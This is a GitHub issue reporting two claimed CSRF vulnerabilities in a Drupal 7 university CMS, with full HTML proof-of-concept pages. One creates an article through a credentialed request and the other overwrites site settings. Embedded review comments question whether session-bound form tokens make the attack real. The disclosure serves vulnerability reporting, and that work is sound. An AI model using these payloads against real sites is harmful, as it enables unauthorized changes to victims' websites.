unlcms / UNL-CMS

Drupal 7 implementation at the University of Nebraska–Lincoln
http://unlcms.unl.edu/
GNU General Public License v2.0

There are two CSRF vulnerabilities that can create new content or update the website settings #941

Closed hkzj closed 5 years ago

hkzj commented 5 years ago

1. There is a CSRF vulnerability that can create new content via `?q=node%2Fadd%2Farticle&render=overlay&render=overlay`. PoC: one.html — creates a new content item

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      // Sends a hand-built multipart/form-data POST to the node/add/article form
      // from the victim's browser. withCredentials makes the browser attach the
      // victim's cookies, so the request runs under whatever session they hold.
      //
      // NOTE(review): the body below carries a fixed form_build_id and form_token
      // (see the two fields near the middle of the body). In Drupal 7 the Form API
      // token is, as far as I know, bound to the submitting user's session, so a
      // token captured from the reporter's own session would be rejected when
      // replayed for any other user. To substantiate this as CSRF the report
      // should show the request succeeding from a second, unrelated account,
      // or explain how the token check is bypassed; otherwise the finding
      // reduces to "a logged-in user can replay their own form post".
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // Target host and path are the reporter's test instance.
        xhr.open("POST", "http:\/\/192.168.98.70\/test\/?q=node%2Fadd%2Farticle&render=overlay&render=overlay", true);
        // The boundary here must match the one used in every part of `body` below.
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykSTT36TsD4Q4APj4");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
        // Attach cookies for the target origin (cross-site credentialed request).
        xhr.withCredentials = true;
        // One multipart part per field of article_node_form, separated by the boundary.
        var body = "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_tags[und]\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][summary]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][value]\"\r\n" + 
          "\r\n" + 
          "test2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"body[und][0][format]\"\r\n" + 
          "\r\n" + 
          "filtered_html\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\r\n" + 
          "\r\n" + 
          "0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"field_image[und][0][display]\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"changed\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          // Session-specific Form API values copied from the reporter's own form
          // render; these are what a genuine CSRF would have to do without.
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_build_id\"\r\n" + 
          "\r\n" + 
          "form-US-_ATkkU7RReGu6drEgOnBWNZYJm9XyETJkq_VShD4\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_token\"\r\n" + 
          "\r\n" + 
          "4RNenVCZF88dLm6Xs2zysuQK3co-ZDm3UFAEn9vuuog\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"form_id\"\r\n" + 
          "\r\n" + 
          "article_node_form\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[link_title]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[description]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[parent]\"\r\n" + 
          "\r\n" + 
          "main-menu:0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"menu[weight]\"\r\n" + 
          "\r\n" + 
          "0\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"log\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"path[alias]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"comment\"\r\n" + 
          "\r\n" + 
          "2\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"name\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"date\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"status\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"promote\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"additional_settings__active_tab\"\r\n" + 
          "\r\n" + 
          "edit-menu\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4\r\n" + 
          "Content-Disposition: form-data; name=\"op\"\r\n" + 
          "\r\n" + 
          // Submit-button label as raw UTF-8 bytes (\xe4\xbf\x9d\xe5\xad\x98), kept
          // byte-exact by the Uint8Array copy below rather than re-encoded as text.
          "\xe4\xbf\x9d\xe5\xad\x98\r\n" + 
          "------WebKitFormBoundarykSTT36TsD4Q4APj4--\r\n";
        // Copy each char code into a byte array so the body is sent as-is.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

2. There is a CSRF vulnerability that can update the website settings via `?q=admin%2Fconfig%2Fsystem%2Fsite-information&render=overlay&render=overlay`. PoC: two.html — updates the website settings

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.70/test/?q=admin%2Fconfig%2Fsystem%2Fsite-information&render=overlay&render=overlay" method="POST">
      <input type="hidden" name="site&#95;name" value="csrf" />
      <input type="hidden" name="site&#95;slogan" value="" />
      <input type="hidden" name="site&#95;mail" value="1225226617&#64;qq&#46;com" />
      <input type="hidden" name="default&#95;nodes&#95;main" value="10" />
      <input type="hidden" name="site&#95;frontpage" value="node" />
      <input type="hidden" name="site&#95;403" value="" />
      <input type="hidden" name="site&#95;404" value="" />
      <input type="hidden" name="form&#95;build&#95;id" value="form&#45;jKteM&#45;yz0FRNt&#45;BgQFbP7GMpveQAE1iAPh64RzWM5Wc" />
      <input type="hidden" name="form&#95;token" value="ZM4juQhCOlR4rr4PXtZrak2vHkOPIpesgR6lRwB8tg4" />
      <input type="hidden" name="form&#95;id" value="system&#95;site&#95;information&#95;settings" />
      <input type="hidden" name="op" value="ä&#191;&#157;å&#173;&#152;é&#133;&#141;ç&#189;&#174;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
NicoleG25 commented 4 years ago

Was this vulnerability ever addressed? Note that CVE-2018-17069 was assigned to this issue.

NicoleG25 commented 4 years ago

Was this vulnerability ever addressed? Note that CVE-2018-17069 was assigned to this issue.

@ericras